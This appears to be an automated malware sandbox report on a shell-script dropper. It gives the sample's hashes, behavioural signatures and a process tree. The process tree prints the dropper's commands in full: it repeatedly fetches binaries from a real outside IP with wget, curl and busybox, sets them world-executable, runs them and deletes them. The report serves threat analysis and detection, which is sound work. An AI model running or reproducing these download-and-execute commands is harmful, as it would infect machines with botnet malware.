Analysis
  max time kernel: 22s
  max time network: 24s
  platform: debian-9_armhf
  resource: debian9-armhf-20240729-en
  resource tags: arch:armhf, image:debian9-armhf-20240729-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
  submitted: 18/10/2024, 01:51
Static task: static1

Behavioral task: behavioral1
  Sample: 618c5d3c5bb9901a9550e576340502f7f2f23506dbb8fa46e8692a8f53d3152c.sh
  Resource: ubuntu1804-amd64-20240611-en

Behavioral task: behavioral2
  Sample: 618c5d3c5bb9901a9550e576340502f7f2f23506dbb8fa46e8692a8f53d3152c.sh
  Resource: debian9-armhf-20240729-en

Behavioral task: behavioral3
  Sample: 618c5d3c5bb9901a9550e576340502f7f2f23506dbb8fa46e8692a8f53d3152c.sh
  Resource: debian9-mipsbe-20240418-en

Behavioral task: behavioral4
  Sample: 618c5d3c5bb9901a9550e576340502f7f2f23506dbb8fa46e8692a8f53d3152c.sh
  Resource: debian9-mipsel-20240611-en
General
  Target: 618c5d3c5bb9901a9550e576340502f7f2f23506dbb8fa46e8692a8f53d3152c.sh
  Size: 10KB
  MD5: e467b8cbbdd28cf09dcbb9e7b6e6ef11
  SHA1: d6c5601ff1d0e611c3c890c145fae6c31f4c6e2a
  SHA256: 618c5d3c5bb9901a9550e576340502f7f2f23506dbb8fa46e8692a8f53d3152c
  SHA512: 0035d8533980a3d2046c0062d11bb3ae860dc14a1fefcc5ece520138629b221762d851d6ede5a30bf323ed50feace6b60517a5d9379e324138611d5927cc615c
  SSDEEP: 192:GuSqVCOCaa2Tkychn/4DQSqVCO2n/4Qp/:GvabTkychn/4zn/4Qp/
Malware Config
Signatures

File and Directory Permissions Modification (1 TTP, 11 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid   process
  689   chmod
  726   chmod
  801   chmod
  819   chmod
  825   chmod
  831   chmod
  700   chmod
  772   chmod
  795   chmod
  807   chmod
  813   chmod

Executes dropped EXE (11 IoCs)
  ioc                                        pid   process
  /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N    690   wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
  /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3    701   yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
  /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU    727   v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
  /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O    773   JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
  /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ    796   ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
  /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4    802   OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
  /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP    808   dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
  /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U    814   4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
  /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx    820   M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
  /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ    826   UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
  /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP    832   NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP

Checks CPU configuration (1 TTP, 11 IoCs)
  Checks CPU information that indicates whether the system is a virtual machine.
  description               ioc             process
  File opened for reading   /proc/cpuinfo   curl
  File opened for reading   /proc/cpuinfo   curl
  File opened for reading   /proc/cpuinfo   curl
  File opened for reading   /proc/cpuinfo   curl
  File opened for reading   /proc/cpuinfo   curl
  File opened for reading   /proc/cpuinfo   curl
  File opened for reading   /proc/cpuinfo   curl
  File opened for reading   /proc/cpuinfo   curl
  File opened for reading   /proc/cpuinfo   curl
  File opened for reading   /proc/cpuinfo   curl
  File opened for reading   /proc/cpuinfo   curl

Reads runtime system information
  description               ioc                              process
  File opened for reading   /proc/sys/crypto/fips_enabled    curl
  File opened for reading   /proc/sys/crypto/fips_enabled    curl
  File opened for reading   /proc/self/auxv                  curl
  File opened for reading   /proc/self/auxv                  curl
  File opened for reading   /proc/self/auxv                  curl
  File opened for reading   /proc/sys/crypto/fips_enabled    curl
  File opened for reading   /proc/self/auxv                  curl
  File opened for reading   /proc/sys/crypto/fips_enabled    curl
  File opened for reading   /proc/self/auxv                  curl
  File opened for reading   /proc/sys/crypto/fips_enabled    curl
  File opened for reading   /proc/self/auxv                  curl
  File opened for reading   /proc/sys/crypto/fips_enabled    curl
  File opened for reading   /proc/self/auxv                  curl
  File opened for reading   /proc/sys/crypto/fips_enabled    curl
  File opened for reading   /proc/self/auxv                  curl
  File opened for reading   /proc/sys/crypto/fips_enabled    curl
  File opened for reading   /proc/self/auxv                  curl
  File opened for reading   /proc/self/auxv                  curl
  File opened for reading   /proc/sys/crypto/fips_enabled    curl
  File opened for reading   /proc/sys/crypto/fips_enabled    curl
  File opened for reading   /proc/self/auxv                  curl
  File opened for reading   /proc/sys/crypto/fips_enabled    curl

Writes file to tmp directory (11 IoCs)
  Malware often drops required files in the /tmp directory.
  description                    ioc                                        process
  File opened for modification   /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3    curl
  File opened for modification   /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU    curl
  File opened for modification   /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4    curl
  File opened for modification   /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ    curl
  File opened for modification   /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP    curl
  File opened for modification   /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N    curl
  File opened for modification   /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O    curl
  File opened for modification   /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ    curl
  File opened for modification   /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP    curl
  File opened for modification   /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U    curl
  File opened for modification   /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx    curl
Processes
  Format: [PID] image path | command line. Child processes are indented under their parent; signatures triggered by a process are listed beneath it.

[PID 660] /tmp/618c5d3c5bb9901a9550e576340502f7f2f23506dbb8fa46e8692a8f53d3152c.sh | /tmp/618c5d3c5bb9901a9550e576340502f7f2f23506dbb8fa46e8692a8f53d3152c.sh
  [PID 662] /bin/rm | /bin/rm bins.sh

  [PID 668] /usr/bin/wget | wget http://87.120.126.196/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
  [PID 677] /usr/bin/curl | curl -O http://87.120.126.196/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
            signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  [PID 686] /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
  [PID 689] /bin/chmod | chmod 777 wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
            signatures: File and Directory Permissions Modification
  [PID 690] /tmp/wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N | ./wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N
            signatures: Executes dropped EXE
  [PID 692] /bin/rm | rm wZbpQzaqUgdNKD5pA61V209uS87QKNMe9N

  [PID 694] /usr/bin/wget | wget http://87.120.126.196/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
  [PID 697] /usr/bin/curl | curl -O http://87.120.126.196/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
            signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  [PID 699] /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
  [PID 700] /bin/chmod | chmod 777 yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
            signatures: File and Directory Permissions Modification
  [PID 701] /tmp/yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3 | ./yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3
            signatures: Executes dropped EXE
  [PID 702] /bin/rm | rm yAcgTFBhTSMWeM2U4VzTDROyNcaITCIqu3

  [PID 703] /usr/bin/wget | wget http://87.120.126.196/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
  [PID 713] /usr/bin/curl | curl -O http://87.120.126.196/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
            signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  [PID 718] /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
  [PID 726] /bin/chmod | chmod 777 v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
            signatures: File and Directory Permissions Modification
  [PID 727] /tmp/v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU | ./v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU
            signatures: Executes dropped EXE
  [PID 728] /bin/rm | rm v0O1uVB9c48x2fNFvm4Vh7bmF4Ki7INoSU

  [PID 729] /usr/bin/wget | wget http://87.120.126.196/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
  [PID 738] /usr/bin/curl | curl -O http://87.120.126.196/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
            signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  [PID 756] /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
  [PID 772] /bin/chmod | chmod 777 JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
            signatures: File and Directory Permissions Modification
  [PID 773] /tmp/JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O | ./JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O
            signatures: Executes dropped EXE
  [PID 775] /bin/rm | rm JyEJeUjSNg7TF3z3yauQMgjbbNTqJFWn5O

  [PID 776] /usr/bin/wget | wget http://87.120.126.196/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
  [PID 779] /usr/bin/curl | curl -O http://87.120.126.196/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
            signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  [PID 794] /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
  [PID 795] /bin/chmod | chmod 777 ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
            signatures: File and Directory Permissions Modification
  [PID 796] /tmp/ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ | ./ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ
            signatures: Executes dropped EXE
  [PID 797] /bin/rm | rm ILAhCew6YHzW1WJvSA5UoFMLNFEMKoyiMZ

  [PID 798] /usr/bin/wget | wget http://87.120.126.196/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
  [PID 799] /usr/bin/curl | curl -O http://87.120.126.196/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
            signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  [PID 800] /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
  [PID 801] /bin/chmod | chmod 777 OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
            signatures: File and Directory Permissions Modification
  [PID 802] /tmp/OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4 | ./OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4
            signatures: Executes dropped EXE
  [PID 803] /bin/rm | rm OsaCb2coYK6zPLezcKO1wQBKXby8hSUdF4

  [PID 804] /usr/bin/wget | wget http://87.120.126.196/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
  [PID 805] /usr/bin/curl | curl -O http://87.120.126.196/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
            signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  [PID 806] /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
  [PID 807] /bin/chmod | chmod 777 dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
            signatures: File and Directory Permissions Modification
  [PID 808] /tmp/dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP | ./dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP
            signatures: Executes dropped EXE
  [PID 809] /bin/rm | rm dyViBq5HtqVHvCrm3m0fQMgiqnyGNQhHmP

  [PID 810] /usr/bin/wget | wget http://87.120.126.196/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
  [PID 811] /usr/bin/curl | curl -O http://87.120.126.196/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
            signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  [PID 812] /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
  [PID 813] /bin/chmod | chmod 777 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
            signatures: File and Directory Permissions Modification
  [PID 814] /tmp/4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U | ./4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U
            signatures: Executes dropped EXE
  [PID 815] /bin/rm | rm 4w1U7Eqs2MxDSXGW0LHpH1cBstkynNzB7U

  [PID 816] /usr/bin/wget | wget http://87.120.126.196/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
  [PID 817] /usr/bin/curl | curl -O http://87.120.126.196/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
            signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  [PID 818] /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
  [PID 819] /bin/chmod | chmod 777 M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
            signatures: File and Directory Permissions Modification
  [PID 820] /tmp/M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx | ./M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx
            signatures: Executes dropped EXE
  [PID 821] /bin/rm | rm M3FHB3RBrOOElhBbDxIQhN6xs0UGXjPVfx

  [PID 822] /usr/bin/wget | wget http://87.120.126.196/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
  [PID 823] /usr/bin/curl | curl -O http://87.120.126.196/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
            signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  [PID 824] /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
  [PID 825] /bin/chmod | chmod 777 UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
            signatures: File and Directory Permissions Modification
  [PID 826] /tmp/UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ | ./UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ
            signatures: Executes dropped EXE
  [PID 827] /bin/rm | rm UpcmTQFBtIxbP16NM2xoCpDVLxRqz21fzZ

  [PID 828] /usr/bin/wget | wget http://87.120.126.196/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
  [PID 829] /usr/bin/curl | curl -O http://87.120.126.196/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
            signatures: Checks CPU configuration; Reads runtime system information; Writes file to tmp directory
  [PID 830] /bin/busybox | /bin/busybox wget http://87.120.126.196/bins/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
  [PID 831] /bin/chmod | chmod 777 NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
            signatures: File and Directory Permissions Modification
  [PID 832] /tmp/NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP | ./NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP
            signatures: Executes dropped EXE
  [PID 833] /bin/rm | rm NZ8LEZI7hs4RZGFCE2inGCQ46RYgt7P6jP

  [PID 834] /usr/bin/wget | wget http://87.120.126.196/bins/oJIvOoC20kLxf3lBzz8ebj3nOTJxXTWbMf
Network
MITRE ATT&CK Enterprise v15
Downloads
  Filesize: 153B
  MD5: 998368d7c95ea4293237f2320546e440
  SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
  SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
  SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97